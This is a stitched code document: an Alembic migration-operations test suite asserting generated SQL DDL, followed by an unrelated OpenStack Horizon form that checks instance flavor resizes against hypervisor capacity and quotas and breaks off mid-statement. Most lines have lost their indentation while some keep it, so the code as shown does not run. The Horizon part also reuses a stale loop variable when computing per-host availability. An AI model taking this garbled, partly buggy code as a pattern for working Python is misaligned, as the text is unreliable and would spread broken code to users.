op.add_column('t1', Column('c1', Boolean, nullable=False), schema='foo')
context.assert_(
'ALTER TABLE foo.t1 ADD COLUMN c1 BOOLEAN NOT NULL',
'ALTER TABLE foo.t1 ADD CHECK (c1 IN (0, 1))'
)
def test_add_column_schema_type_checks_rule(self):
"""Test that a schema type doesn't generate a
constraint based on check rule."""
context = op_fixture('postgresql')
op.add_column('t1', Column('c1', Boolean, nullable=False))
context.assert_(
'ALTER TABLE t1 ADD COLUMN c1 BOOLEAN NOT NULL',
)
def test_add_column_fk_self_referential(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, ForeignKey('t1.c2'), nullable=False))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE t1 ADD FOREIGN KEY(c1) REFERENCES t1 (c2)"
)
def test_add_column_schema_fk_self_referential(self):
context = op_fixture()
op.add_column(
't1',
Column('c1', Integer, ForeignKey('foo.t1.c2'), nullable=False),
schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE foo.t1 ADD FOREIGN KEY(c1) REFERENCES foo.t1 (c2)"
)
def test_add_column_fk_schema(self):
context = op_fixture()
op.add_column(
't1',
Column('c1', Integer, ForeignKey('remote.t2.c2'), nullable=False))
context.assert_(
'ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL',
'ALTER TABLE t1 ADD FOREIGN KEY(c1) REFERENCES remote.t2 (c2)'
)
def test_add_column_schema_fk_schema(self):
context = op_fixture()
op.add_column(
't1',
Column('c1', Integer, ForeignKey('remote.t2.c2'), nullable=False),
schema='foo')
context.assert_(
'ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL',
'ALTER TABLE foo.t1 ADD FOREIGN KEY(c1) REFERENCES remote.t2 (c2)'
)
def test_drop_column(self):
context = op_fixture()
op.drop_column('t1', 'c1')
context.assert_("ALTER TABLE t1 DROP COLUMN c1")
def test_drop_column_schema(self):
context = op_fixture()
op.drop_column('t1', 'c1', schema='foo')
context.assert_("ALTER TABLE foo.t1 DROP COLUMN c1")
def test_alter_column_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=True)
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE t ALTER COLUMN c DROP NOT NULL"
)
def test_alter_column_schema_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=True, schema='foo')
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE foo.t ALTER COLUMN c DROP NOT NULL"
)
def test_alter_column_not_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=False)
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE t ALTER COLUMN c SET NOT NULL"
)
def test_alter_column_schema_not_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=False, schema='foo')
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE foo.t ALTER COLUMN c SET NOT NULL"
)
def test_alter_column_rename(self):
context = op_fixture()
op.alter_column("t", "c", new_column_name="x")
context.assert_(
"ALTER TABLE t RENAME c TO x"
)
def test_alter_column_schema_rename(self):
context = op_fixture()
op.alter_column("t", "c", new_column_name="x", schema='foo')
context.assert_(
"ALTER TABLE foo.t RENAME c TO x"
)
def test_alter_column_type(self):
context = op_fixture()
op.alter_column("t", "c", type_=String(50))
context.assert_(
'ALTER TABLE t ALTER COLUMN c TYPE VARCHAR(50)'
)
def test_alter_column_schema_type(self):
context = op_fixture()
op.alter_column("t", "c", type_=String(50), schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c TYPE VARCHAR(50)'
)
def test_alter_column_set_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default="q")
context.assert_(
"ALTER TABLE t ALTER COLUMN c SET DEFAULT 'q'"
)
def test_alter_column_schema_set_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default="q", schema='foo')
context.assert_(
"ALTER TABLE foo.t ALTER COLUMN c SET DEFAULT 'q'"
)
def test_alter_column_set_compiled_default(self):
context = op_fixture()
op.alter_column("t", "c",
server_default=func.utc_thing(func.current_timestamp()))
context.assert_(
"ALTER TABLE t ALTER COLUMN c SET DEFAULT utc_thing(CURRENT_TIMESTAMP)"
)
def test_alter_column_schema_set_compiled_default(self):
context = op_fixture()
op.alter_column("t", "c",
server_default=func.utc_thing(func.current_timestamp()),
schema='foo')
context.assert_(
"ALTER TABLE foo.t ALTER COLUMN c "
"SET DEFAULT utc_thing(CURRENT_TIMESTAMP)"
)
def test_alter_column_drop_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default=None)
context.assert_(
'ALTER TABLE t ALTER COLUMN c DROP DEFAULT'
)
def test_alter_column_schema_drop_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default=None, schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c DROP DEFAULT'
)
def test_alter_column_schema_type_unnamed(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean())
context.assert_(
'ALTER TABLE t ALTER COLUMN c BIT',
'ALTER TABLE t ADD CHECK (c IN (0, 1))'
)
def test_alter_column_schema_schema_type_unnamed(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean(), schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c BIT',
'ALTER TABLE foo.t ADD CHECK (c IN (0, 1))'
)
def test_alter_column_schema_type_named(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean(name="xyz"))
context.assert_(
'ALTER TABLE t ALTER COLUMN c BIT',
'ALTER TABLE t ADD CONSTRAINT xyz CHECK (c IN (0, 1))'
)
def test_alter_column_schema_schema_type_named(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean(name="xyz"), schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c BIT',
'ALTER TABLE foo.t ADD CONSTRAINT xyz CHECK (c IN (0, 1))'
)
def test_alter_column_schema_type_existing_type(self):
context = op_fixture('mssql')
op.alter_column(
"t", "c", type_=String(10), existing_type=Boolean(name="xyz"))
context.assert_(
'ALTER TABLE t DROP CONSTRAINT xyz',
'ALTER TABLE t ALTER COLUMN c VARCHAR(10)'
)
def test_alter_column_schema_schema_type_existing_type(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=String(10),
existing_type=Boolean(name="xyz"), schema='foo')
context.assert_(
'ALTER TABLE foo.t DROP CONSTRAINT xyz',
'ALTER TABLE foo.t ALTER COLUMN c VARCHAR(10)'
)
def test_alter_column_schema_type_existing_type_no_const(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", type_=String(10), existing_type=Boolean())
context.assert_(
'ALTER TABLE t ALTER COLUMN c TYPE VARCHAR(10)'
)
def test_alter_column_schema_schema_type_existing_type_no_const(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", type_=String(10), existing_type=Boolean(),
schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c TYPE VARCHAR(10)'
)
def test_alter_column_schema_type_existing_type_no_new_type(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", nullable=False, existing_type=Boolean())
context.assert_(
'ALTER TABLE t ALTER COLUMN c SET NOT NULL'
)
def test_alter_column_schema_schema_type_existing_type_no_new_type(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", nullable=False, existing_type=Boolean(),
schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c SET NOT NULL'
)
def test_add_foreign_key(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho)"
)
def test_add_foreign_key_schema(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
source_schema='foo2', referent_schema='bar2')
context.assert_(
"ALTER TABLE foo2.t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES bar2.t2 (bat, hoho)"
)
def test_add_foreign_key_onupdate(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
onupdate='CASCADE')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) ON UPDATE CASCADE"
)
def test_add_foreign_key_ondelete(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
ondelete='CASCADE')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) ON DELETE CASCADE"
)
def test_add_foreign_key_deferrable(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
deferrable=True)
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) DEFERRABLE"
)
def test_add_foreign_key_initially(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
initially='INITIAL')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) INITIALLY INITIAL"
)
@config.requirements.foreign_key_match
def test_add_foreign_key_match(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
match='SIMPLE')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) MATCH SIMPLE"
)
def test_add_foreign_key_dialect_kw(self):
op_fixture()
with mock.patch(
"sqlalchemy.schema.ForeignKeyConstraint"
) as fkc:
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
foobar_arg='xyz')
if config.requirements.foreign_key_match.enabled:
eq_(fkc.mock_calls[0],
mock.call(['foo', 'bar'], ['t2.bat', 't2.hoho'],
onupdate=None, ondelete=None, name='fk_test',
foobar_arg='xyz',
deferrable=None, initially=None, match=None))
else:
eq_(fkc.mock_calls[0],
mock.call(['foo', 'bar'], ['t2.bat', 't2.hoho'],
onupdate=None, ondelete=None, name='fk_test',
foobar_arg='xyz',
deferrable=None, initially=None))
def test_add_foreign_key_self_referential(self):
context = op_fixture()
op.create_foreign_key("fk_test", "t1", "t1", ["foo"], ["bar"])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test "
"FOREIGN KEY(foo) REFERENCES t1 (bar)"
)
def test_add_primary_key_constraint(self):
context = op_fixture()
op.create_primary_key("pk_test", "t1", ["foo", "bar"])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT pk_test PRIMARY KEY (foo, bar)"
)
def test_add_primary_key_constraint_schema(self):
context = op_fixture()
op.create_primary_key("pk_test", "t1", ["foo"], schema="bar")
context.assert_(
"ALTER TABLE bar.t1 ADD CONSTRAINT pk_test PRIMARY KEY (foo)"
)
def test_add_check_constraint(self):
context = op_fixture()
op.create_check_constraint(
"ck_user_name_len",
"user_table",
func.len(column('name')) > 5
)
context.assert_(
"ALTER TABLE user_table ADD CONSTRAINT ck_user_name_len "
"CHECK (len(name) > 5)"
)
def test_add_check_constraint_schema(self):
context = op_fixture()
op.create_check_constraint(
"ck_user_name_len",
"user_table",
func.len(column('name')) > 5,
schema='foo'
)
context.assert_(
"ALTER TABLE foo.user_table ADD CONSTRAINT ck_user_name_len "
"CHECK (len(name) > 5)"
)
def test_add_unique_constraint(self):
context = op_fixture()
op.create_unique_constraint('uk_test', 't1', ['foo', 'bar'])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT uk_test UNIQUE (foo, bar)"
)
def test_add_foreign_key_legacy_kwarg(self):
context = op_fixture()
op.create_foreign_key(
name='some_fk',
source='some_table',
referent='referred_table',
local_cols=['a', 'b'],
remote_cols=['c', 'd'],
ondelete='CASCADE'
)
context.assert_(
"ALTER TABLE some_table ADD CONSTRAINT some_fk "
"FOREIGN KEY(a, b) REFERENCES referred_table (c, d) "
"ON DELETE CASCADE"
)
def test_add_unique_constraint_legacy_kwarg(self):
context = op_fixture()
op.create_unique_constraint(
name='uk_test',
source='t1',
local_cols=['foo', 'bar'])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT uk_test UNIQUE (foo, bar)"
)
def test_drop_constraint_legacy_kwarg(self):
context = op_fixture()
op.drop_constraint(name='pk_name',
table_name='sometable',
type_='primary')
context.assert_(
"ALTER TABLE sometable DROP CONSTRAINT pk_name"
)
def test_create_pk_legacy_kwarg(self):
context = op_fixture()
op.create_primary_key(name=None,
table_name='sometable',
cols=['router_id', 'l3_agent_id'])
context.assert_(
"ALTER TABLE sometable ADD PRIMARY KEY (router_id, l3_agent_id)"
)
def test_legacy_kwarg_catches_arg_missing(self):
op_fixture()
assert_raises_message(
TypeError,
"missing required positional argument: columns",
op.create_primary_key,
name=None,
table_name='sometable',
wrong_cols=['router_id', 'l3_agent_id']
)
def test_add_unique_constraint_schema(self):
context = op_fixture()
op.create_unique_constraint(
'uk_test', 't1', ['foo', 'bar'], schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD CONSTRAINT uk_test UNIQUE (foo, bar)"
)
def test_drop_constraint(self):
context = op_fixture()
op.drop_constraint('foo_bar_bat', 't1')
context.assert_(
"ALTER TABLE t1 DROP CONSTRAINT foo_bar_bat"
)
def test_drop_constraint_schema(self):
context = op_fixture()
op.drop_constraint('foo_bar_bat', 't1', schema='foo')
context.assert_(
"ALTER TABLE foo.t1 DROP CONSTRAINT foo_bar_bat"
)
def test_create_index(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'])
context.assert_(
"CREATE INDEX ik_test ON t1 (foo, bar)"
)
def test_create_unique_index(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'], unique=True)
context.assert_(
"CREATE UNIQUE INDEX ik_test ON t1 (foo, bar)"
)
@config.requirements.fail_before_sqla_09
def test_create_index_quote_flag(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'], quote=True)
context.assert_(
'CREATE INDEX "ik_test" ON t1 (foo, bar)'
)
def test_create_index_table_col_event(self):
context = op_fixture()
op.create_index('ik_test', 'tbl_with_auto_appended_column', ['foo', 'bar'])
context.assert_(
"CREATE INDEX ik_test ON tbl_with_auto_appended_column (foo, bar)"
)
def test_add_unique_constraint_col_event(self):
context = op_fixture()
op.create_unique_constraint(
'ik_test',
'tbl_with_auto_appended_column', ['foo', 'bar'])
context.assert_(
"ALTER TABLE tbl_with_auto_appended_column "
"ADD CONSTRAINT ik_test UNIQUE (foo, bar)"
)
def test_create_index_schema(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'], schema='foo')
context.assert_(
"CREATE INDEX ik_test ON foo.t1 (foo, bar)"
)
def test_drop_index(self):
context = op_fixture()
op.drop_index('ik_test')
context.assert_(
"DROP INDEX ik_test"
)
def test_drop_index_schema(self):
context = op_fixture()
op.drop_index('ik_test', schema='foo')
context.assert_(
"DROP INDEX foo.ik_test"
)
def test_drop_table(self):
context = op_fixture()
op.drop_table('tb_test')
context.assert_(
"DROP TABLE tb_test"
)
def test_drop_table_schema(self):
context = op_fixture()
op.drop_table('tb_test', schema='foo')
context.assert_(
"DROP TABLE foo.tb_test"
)
def test_create_table_selfref(self):
context = op_fixture()
op.create_table(
"some_table",
Column('id', Integer, primary_key=True),
Column('st_id', Integer, ForeignKey('some_table.id'))
)
context.assert_(
"CREATE TABLE some_table ("
"id INTEGER NOT NULL, "
"st_id INTEGER, "
"PRIMARY KEY (id), "
"FOREIGN KEY(st_id) REFERENCES some_table (id))"
)
def test_create_table_fk_and_schema(self):
context = op_fixture()
t1 = op.create_table(
"some_table",
Column('id', Integer, primary_key=True),
Column('foo_id', Integer, ForeignKey('foo.id')),
schema='schema'
)
context.assert_(
"CREATE TABLE schema.some_table ("
"id INTEGER NOT NULL, "
"foo_id INTEGER, "
"PRIMARY KEY (id), "
"FOREIGN KEY(foo_id) REFERENCES foo (id))"
)
eq_(t1.c.id.name, "id")
eq_(t1.schema, "schema")
def test_create_table_no_pk(self):
context = op_fixture()
t1 = op.create_table(
"some_table",
Column('x', Integer),
Column('y', Integer),
Column('z', Integer),
)
context.assert_(
"CREATE TABLE some_table (x INTEGER, y INTEGER, z INTEGER)"
)
assert not t1.primary_key
def test_create_table_two_fk(self):
context = op_fixture()
op.create_table(
"some_table",
Column('id', Integer, primary_key=True),
Column('foo_id', Integer, ForeignKey('foo.id')),
Column('foo_bar', Integer, ForeignKey('foo.bar')),
)
context.assert_(
"CREATE TABLE some_table ("
"id INTEGER NOT NULL, "
"foo_id INTEGER, "
"foo_bar INTEGER, "
"PRIMARY KEY (id), "
"FOREIGN KEY(foo_id) REFERENCES foo (id), "
"FOREIGN KEY(foo_bar) REFERENCES foo (bar))"
)
def test_inline_literal(self):
context = op_fixture()
from sqlalchemy.sql import table, column
from sqlalchemy import String, Integer
account = table('account',
column('name', String),
column('id', Integer)
)
op.execute(
account.update().
where(account.c.name == op.inline_literal('account 1')).
values({'name': op.inline_literal('account 2')})
)
op.execute(
account.update().
where(account.c.id == op.inline_literal(1)).
values({'id': op.inline_literal(2)})
)
context.assert_(
"UPDATE account SET name='account 2' WHERE account.name = 'account 1'",
"UPDATE account SET id=2 WHERE account.id = 1"
)
    def test_cant_op(self):
        """Calling through the module-level ``op`` proxy with no migration
        context established must raise a descriptive NameError."""
        # Other tests may have installed the proxy; remove it so the
        # "not yet established" error path is actually exercised.
        if hasattr(op, '_proxy'):
            del op._proxy
        assert_raises_message(
            NameError,
            "Can't invoke function 'inline_literal', as the "
            "proxy object has not yet been established "
            "for the Alembic 'Operations' class. "
            "Try placing this code inside a callable.",
            op.inline_literal, "asdf"
        )
    def test_naming_changes(self):
        """Legacy keyword spellings produce the same SQL as the modern ones."""
        # ``name`` is the legacy spelling of ``new_column_name``.
        context = op_fixture()
        op.alter_column("t", "c", name="x")
        context.assert_("ALTER TABLE t RENAME c TO x")
        context = op_fixture()
        op.alter_column("t", "c", new_column_name="x")
        context.assert_("ALTER TABLE t RENAME c TO x")
        # ``type`` (legacy; shadows the builtin) vs the modern ``type_``.
        context = op_fixture('mysql')
        op.drop_constraint("f1", "t1", type="foreignkey")
        context.assert_("ALTER TABLE t1 DROP FOREIGN KEY f1")
        context = op_fixture('mysql')
        op.drop_constraint("f1", "t1", type_="foreignkey")
        context.assert_("ALTER TABLE t1 DROP FOREIGN KEY f1")
@config.requirements.fail_before_sqla_084
def test_naming_changes_drop_idx(self):
context = op_fixture('mssql')
op.drop_index('ik_test', tablename='t1')
context.assert_("DROP INDEX ik_test ON t1")
class SQLModeOpTest(TestBase):
    """Tests for offline ("--sql") mode with literal rendering of binds."""
    @config.requirements.sqlalchemy_09
    def test_auto_literals(self):
        """Bound parameters are rendered inline when literal_binds is on."""
        context = op_fixture(as_sql=True, literal_binds=True)
        from sqlalchemy.sql import table, column
        from sqlalchemy import String, Integer
        account = table('account',
            column('name', String),
            column('id', Integer)
        )
        # Both a Core expression with inline_literal() and a text() with
        # bindparams() must render their values as literals.
        op.execute(
            account.update().
            where(account.c.name == op.inline_literal('account 1')).
            values({'name': op.inline_literal('account 2')})
        )
        op.execute(text("update table set foo=:bar").bindparams(bar='bat'))
        context.assert_(
            "UPDATE account SET name='account 2' "
            "WHERE account.name = 'account 1'",
            "update table set foo='bat'"
        )
    def test_create_table_literal_binds(self):
        """create_table emits complete DDL text in offline mode."""
        context = op_fixture(as_sql=True, literal_binds=True)
        op.create_table(
            "some_table",
            Column('id', Integer, primary_key=True),
            Column('st_id', Integer, ForeignKey('some_table.id'))
        )
        context.assert_(
            "CREATE TABLE some_table (id INTEGER NOT NULL, st_id INTEGER, "
            "PRIMARY KEY (id), FOREIGN KEY(st_id) REFERENCES some_table (id))"
        )
class CustomOpTest(TestBase):
    """A user-defined operation can be registered on the Operations proxy
    and invoked like a built-in op."""
    def test_custom_op(self):
        from alembic.operations import Operations, MigrateOperation
        # Registers ``op.create_sequence(...)`` as a new operation.
        @Operations.register_operation("create_sequence")
        class CreateSequenceOp(MigrateOperation):
            """Create a SEQUENCE."""
            def __init__(self, sequence_name, **kw):
                self.sequence_name = sequence_name
                self.kw = kw
            @classmethod
            def create_sequence(cls, operations, sequence_name, **kw):
                """Issue a "CREATE SEQUENCE" instruction."""
                op = CreateSequenceOp(sequence_name, **kw)
                return operations.invoke(op)
        # The implementation receives the Operations facade plus the op
        # object built above, and emits the actual DDL.
        @Operations.implementation_for(CreateSequenceOp)
        def create_sequence(operations, operation):
            operations.execute("CREATE SEQUENCE %s" % operation.sequence_name)
        context = op_fixture()
        op.create_sequence('foob')
        context.assert_("CREATE SEQUENCE foob")
class EnsureOrigObjectFromToTest(TestBase):
    """the to_XYZ and from_XYZ methods are used heavily in autogenerate.
    It's critical that these methods, at least the "drop" form,
    always return the *same* object if available so that all the info
    passed into to_XYZ is maintained in the from_XYZ.
    """
    def test_drop_index(self):
        # Round-trip must be identity (is_), not just equality.
        schema_obj = schemaobj.SchemaObjects()
        idx = schema_obj.index('x', 'y', ['z'])
        op = ops.DropIndexOp.from_index(idx)
        is_(
            op.to_index(), idx
        )
    def test_create_index(self):
        # Same identity guarantee for the "create" form.
        schema_obj = schemaobj.SchemaObjects()
        idx = schema_obj.index('x', 'y', ['z'])
        op = ops.CreateIndexOp.from_index(idx)
        is_(
            op.to_index(), idx
        )
    def test_drop_table(self):
        schema_obj = schemaobj.SchemaObjects()
        table = schema_obj.table('x', Column('q', Integer))
        op = ops.DropTableOp.from_table(table)
        is_(
            op.to_table(), table
        )
    def test_create_table(self):
        schema_obj = schemaobj.SchemaObjects()
        table = schema_obj.table('x', Column('q', Integer))
        op = ops.CreateTableOp.from_table(table)
        is_(
            op.to_table(), table
        )
    def test_drop_unique_constraint(self):
        schema_obj = schemaobj.SchemaObjects()
        const = schema_obj.unique_constraint('x', 'foobar', ['a'])
        op = ops.DropConstraintOp.from_constraint(const)
        is_(
            op.to_constraint(), const
        )
    def test_drop_constraint_not_available(self):
        # A DropConstraintOp built without an original constraint object
        # cannot reconstruct one and must raise.
        op = ops.DropConstraintOp('x', 'y', type_='unique')
        assert_raises_message(
            ValueError,
            "constraint cannot be produced",
            op.to_constraint
        )
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from django.views.decorators.debug import sensitive_variables # noqa
from horizon import exceptions
from horizon import forms
from horizon import workflows
from horizon import messages
from openstack_dashboard import api
from openstack_dashboard.usage import quotas
from openstack_dashboard.dashboards.admin.instances \
import utils as instance_utils
LOG = logging.getLogger(__name__)
class ResourceAction(workflows.Action):
    """Workflow action for choosing a new flavor for selected instances."""
    # Hidden field holding the selected instance IDs joined by "_";
    # populated outside this form (its value is split on "_" in clean()).
    checkboxlist = forms.CharField(widget=forms.HiddenInput())
    flavor = forms.ChoiceField(label=_("New Flavor"),
                            help_text=_("Choose the flavor to resize."))
    class Meta:
        name = _("Flavor Choice")
        help_text_template = ("admin/instances/_update_instance_resource_help.html")
    def __init__(self, request, context, *args, **kwargs):
        # Stash request/context before base-class init; clean() uses
        # self.request for nova API calls.
        self.request = request
        self.context = context
        super(ResourceAction, self).__init__(request, context, *args, **kwargs)
def clean(self):
cleaned_data = super(ResourceAction, self).clean()
checkbox = cleaned_data.get("checkboxlist", None)
if not checkbox:
error_message=_("No instance option selected")
raise forms.ValidationError(error_message)
select_flavor_id = cleaned_data.get('flavor')
select_flavor = api.nova.flavor_get(self.request, select_flavor_id)
select_flavor_vcpus = select_flavor.vcpus
select_flavor_ram = select_flavor.ram
select_flavor_disk = select_flavor.disk
select_flavor_ephemeral = select_flavor.ephemeral
instance_ids = checkbox.split("_")
resource_allocation_ratio = api.nova.get_resource_allocation_ratio(self.request)
ram_allocation = resource_allocation_ratio.get('ram_allocation', 1.5)
cpu_allocation = resource_allocation_ratio.get('cpu_allocation', 16.0)
disk_allocation = resource_allocation_ratio.get('disk_allocation', 1.0)
flug =0
tenant_resources = {}
server_hosts = {}
for instance_id in instance_ids:
instance = api.nova.server_get(self.request, instance_id)
instance_host = getattr(instance, 'vm_node', None)
flavor_id = instance.flavor['id']
if flavor_id == select_flavor_id:
flug =1
break
flavor = api.nova.flavor_get(self.request, flavor_id)
if select_flavor_disk < flavor.disk or select_flavor_ephemeral < flavor.ephemeral:
flug =2
break
if server_hosts.has_key(instance_host):
server_hosts[instance_host]['vcpus'] += instance.vcpus
server_hosts[instance_host]['rams'] += instance.rams
instance_disk = flavor.disk + flavor.ephemeral
server_hosts[instance_host]['disks'] += instance_disk
server_hosts[instance_host]['count'] += 1
else:
server_hosts[instance_host] ={}
server_hosts[instance_host]['vcpus'] = instance.vcpus
server_hosts[instance_host]['rams'] = instance.rams
server_hosts[instance_host]['disks'] = flavor.disk + flavor.ephemeral
server_hosts[instance_host]['count'] = 1
if tenant_resources.has_key(instance.tenant_id):
tenant_resources[instance.tenant_id]['vcpus'] = tenant_resources[instance.tenant_id]['vcpus'] + instance.vcpus
tenant_resources[instance.tenant_id]['rams'] = tenant_resources[instance.tenant_id]['rams'] + instance.rams
tenant_resources[instance.tenant_id]['count'] = tenant_resources[instance.tenant_id]['count'] + 1
else:
tenant_resources[instance.tenant_id] ={}
tenant_resources[instance.tenant_id]['vcpus']=instance.vcpus
tenant_resources[instance.tenant_id]['rams']=instance.rams
tenant_resources[instance.tenant_id]['count']=1
server_error =[]
hypervisors = api.nova.hypervisor_list(self.request)
for hypervisor in hypervisors:
hypervisor_hostname = hypervisor.hypervisor_hostname
server_name = hypervisor_hostname.split('.')[0]
if server_hosts.has_key(server_name):
if hypervisor.hypervisor_type =="xen":
total_vcpus = hypervisor.vcpus
total_rams = hypervisor.memory_mb
total_disk = hypervisor.local_gb
avail_vcpus = total_vcpus - hypervisor.vcpus_used + server_hosts[instance_host]['vcpus']
avail_rams = total_rams - hypervisor.memory_mb_used + server_hosts[instance_host]['rams']
avail_disk = total_disk - hypervisor.local_gb_used + server_hosts[instance_host]['disks']
else:
total_vcpus = hypervisor.vcpus * cpu_allocation
total_rams = hypervisor.memory_mb * ram_allocation
total_disk = hypervisor.local_gb * disk_allocation
avail_vcpus = total_vcpus - hypervisor.vcpus_used + server_hosts[instance_host]['vcpus']
avail_rams = total_rams - hypervisor.memory_mb_used + server_hosts[instance_host]['rams']
avail_disk = total_disk - hypervisor.local_gb_used + server_hosts[instance_host]['disks']
request_vcpus = server_hosts[instance_host]['count'] * select_flavor_vcpus
request_rams = server_hosts[instance_host]['count'] * select_flavor_ram
request_disk = server_hosts[instance_host]['count'] * (select_flavor_disk + select_flavor_ephemeral)
if avail_vcpus < request_vcpus:
flug = 3
server_error.append(_("Compute Node %(server_name)s:VCPU:(Available:%(avail)s, Requestd:%(req)s)")
% {'server_name': server_name, 'avail': avail_vcpus, 'req':request_vcpus})
if avail_rams < request_rams:
flug = 3
server_error.append(_("Compute Node %(server_name)s:RAM:(Available:%(avail)s(MB), Requestd:%(req)s(MB))")
% {'server_name': server_name, 'avail': avail_rams, 'req':request_rams})
if avail_disk < request_disk:
flug = 3
server_error.append(_("Compute Node %(server_name)s:Disk:(Available:%(avail)s(GB), Requestd:%(req)s(GB))")
% {'server_name': server_name, 'avail': avail_disk, 'req':request_disk})
if flug !=3:
count_error =[]
for tenant_id in tenant_resources.keys():
select_resource_vcpus = tenant_resources[tenant_id]['count'] * select_flavor_vcpus
select_resource_rams = tenant_resources[tenant_id]['count'] * select_flavor_ram
tenant = api.keystone.tenant_get(self.request, tenant_id)
#wengshuhua TODO
#usages = quotas.tenant_quota_usages(self.request, pool=tenant.name)
usages = quotas.tenant_quota_usages(self.request)
available_vcpus = usages['cores']['available'] + tenant_resources[tenant_id]['vcpus']
available_ram = usages['ram']['available'] + tenant_resources[tenant_id]['rams']
if available_vcpus < select_resource_vcpus:
flug = 4
count_error.append(_("Pool %(pool)s:VCPU(Available: %(avail)s(MB),"
"Requested: %(req)s(MB))") % {'pool':tenant.name, 'avail': available_vcpus, 'req': select_resource_vcpus})
if available_ram < select_resource_rams:
flug = 4
count_error.append(_("Pool(%(pool)s):RAM(Available: %(avail)s,"
"Requested: %(req)s)") % {'pool':tenant.name, 'avail': available_ram, 'req': select_resource_rams})
if flug ==1:
msg = _("The flavor is same as the origin flavor of some instances you select.Please reselect.")
self._errors['flavor'] = self.error_class([msg])
elif flug ==2:
msg = _("The disk of selected flavor is lower than the origin disk of some instances.Please reselect.")
self._errors['flavor'] = self.error_class([msg])
elif flug == 3:
if server_error:
value_str = ", ".join(server_error)
msg = (_('The instance cannot be updated. '
'The following requested resource(s) exceed '
'quota(s): %s.') % value_str)
self._errors['flavor'] = self.error_class([msg])
elif flug == 4:
if count_error:
value_str = ", ".join(count_error)
msg = (_('The instance cannot be updated. '
'The following requested resource(s) exceed '
